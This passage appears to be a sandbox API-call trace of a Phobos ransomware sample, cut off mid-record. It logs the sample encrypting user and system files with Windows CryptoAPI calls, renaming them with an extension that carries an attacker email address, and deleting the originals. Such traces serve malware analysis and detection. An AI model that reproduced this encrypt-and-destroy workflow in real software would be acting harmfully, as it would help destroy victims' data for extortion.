[0211.922] CloseHandle (hObject=0xac) returned 1 [0211.923] CloseHandle (hObject=0xfc) returned 1 [0211.923] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url")) returned 1 [0211.923] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.924] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=363) returned 1 [0211.924] CloseHandle (hObject=0xfc) returned 1 [0211.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk")) returned 0x20 [0211.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\links\\recentplaces.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.924] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.924] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\links\\recentplaces.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.925] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.925] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.925] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x16b, lpOverlapped=0x0) returned 1 [0211.926] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x170, dwBufLen=0x170 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x170) returned 1 [0211.926] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x170, lpOverlapped=0x0) returned 1 [0211.927] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.927] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.927] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0211.927] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.927] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0211.927] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.927] CloseHandle (hObject=0xfc) returned 1 [0211.927] CloseHandle (hObject=0xac) returned 1 [0211.927] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk")) returned 1 [0211.928] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.929] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=189440) returned 1 [0211.929] CloseHandle (hObject=0xac) returned 1 [0211.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1")) returned 0x22 [0211.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.dat.log1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.929] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.929] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.dat.log1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.930] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.930] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.930] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2e400, lpOverlapped=0x0) returned 1 [0211.978] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2e410, dwBufLen=0x2e410 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2e410) returned 1 [0211.980] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2e410, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2e410, lpOverlapped=0x0) returned 1 [0211.983] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.983] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.983] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0211.984] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.984] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0211.984] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.984] CloseHandle (hObject=0xac) returned 1 [0211.984] CloseHandle (hObject=0xfc) returned 1 [0211.984] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1")) returned 1 [0211.986] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.987] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=524288) returned 1 [0211.987] CloseHandle (hObject=0xfc) returned 1 [0211.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms")) returned 0x26 [0211.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.987] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.987] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.987] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.988] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.988] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x80000, lpOverlapped=0x0) returned 1 [0212.206] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80010, dwBufLen=0x80010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80010) returned 1 [0212.210] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x80010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x80010, lpOverlapped=0x0) returned 1 [0212.218] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0212.218] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0212.218] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe0, dwBufLen=0xe0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe0) returned 1 [0212.218] CryptDestroyKey (hKey=0xa328e8) returned 1 [0212.218] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x192, lpOverlapped=0x0) returned 1 [0212.218] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.218] CloseHandle (hObject=0xfc) returned 1 [0212.219] CloseHandle (hObject=0xac) returned 1 [0212.231] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms")) returned 1 [0212.235] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0212.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0212.235] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=9699328) returned 1 [0212.235] CloseHandle (hObject=0xfc) returned 1 [0212.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv")) returned 0x20 [0212.235] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0212.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0212.237] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0212.237] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0212.237] ReadFile (in: hFile=0xfc, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0212.274] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x315555, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0212.274] ReadFile (in: hFile=0xfc, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0212.303] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x900000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0212.303] ReadFile (in: hFile=0xfc, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0212.500] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32928) returned 1 [0212.500] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0212.500] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0080, dwBufLen=0xc0080 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0080) returned 1 [0212.514] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.514] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0212.514] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0132, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0132, lpOverlapped=0x0) returned 1 [0212.539] SetEndOfFile (hFile=0xfc) returned 1 [0212.539] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x900000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0212.539] WriteFile (in: hFile=0xfc, lpBuffer=0x313016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313016a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0212.541] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x315555, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0212.541] WriteFile (in: hFile=0xfc, lpBuffer=0x313016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313016a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0212.551] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0212.551] WriteFile (in: hFile=0xfc, lpBuffer=0x313016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313016a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0212.554] CloseHandle (hObject=0xfc) returned 1 [0212.554] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f960 | out: phKey=0x2e0f960*=0xa32928) returned 1 [0212.554] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f948, dwFlags=0x0) returned 1 [0212.554] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x2e0f914 | out: pbData=0x20f16c0, pdwDataLen=0x2e0f914) returned 1 [0212.554] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.554] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0212.555] GetProcAddress (hModule=0x76180000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x761ad668 [0212.555] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0212.555] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 Thread: id = 140 os_tid = 0x7b4 [0132.733] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x22d7aa0 [0132.733] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x22e7aa8 [0132.733] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x28) returned 0x22277c0 [0132.733] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x110102) returned 0x3190020 [0132.733] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x50) returned 0x22277f0 [0132.733] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fb18 | out: phKey=0x2a0fb18*=0xa28ba8) returned 1 [0132.734] CryptSetKeyParam (hKey=0xa28ba8, dwParam=0x1, pbData=0x2a0fb00, dwFlags=0x0) returned 1 [0132.734] CryptDecrypt (in: hKey=0xa28ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22277f0, pdwDataLen=0x2a0facc | out: pbData=0x22277f0, pdwDataLen=0x2a0facc) returned 1 [0132.734] CryptDestroyKey (hKey=0xa28ba8) returned 1 [0132.734] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0132.734] GetProcAddress (hModule=0x76180000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x761ad650 [0132.734] Wow64DisableWow64FsRedirection (in: OldValue=0x2a0fb64 | out: OldValue=0x2a0fb64*=0x0) returned 1 [0132.734] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x22277f0 | out: hHeap=0x20f0000) returned 1 [0132.734] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0132.734] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.734] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=129) returned 1 [0132.734] CloseHandle (hObject=0x11c) returned 1 [0132.735] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0132.735] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0x20 [0132.735] ResetEvent (hEvent=0x108) returned 1 [0132.735] SetEvent (hEvent=0x10c) returned 1 [0132.735] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0132.735] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.735] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0xffffffff) returned 0x0 [0132.750] ResetEvent (hEvent=0x108) returned 1 [0132.750] SetEvent (hEvent=0x10c) returned 1 [0132.750] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0132.750] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0132.753] GetFileSizeEx (in: hFile=0x128, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2296) returned 1 [0132.753] CloseHandle (hObject=0x128) returned 1 [0132.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0132.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0x2020 [0132.763] ResetEvent (hEvent=0x108) returned 1 [0132.763] SetEvent (hEvent=0x10c) returned 1 [0132.763] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0132.763] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), 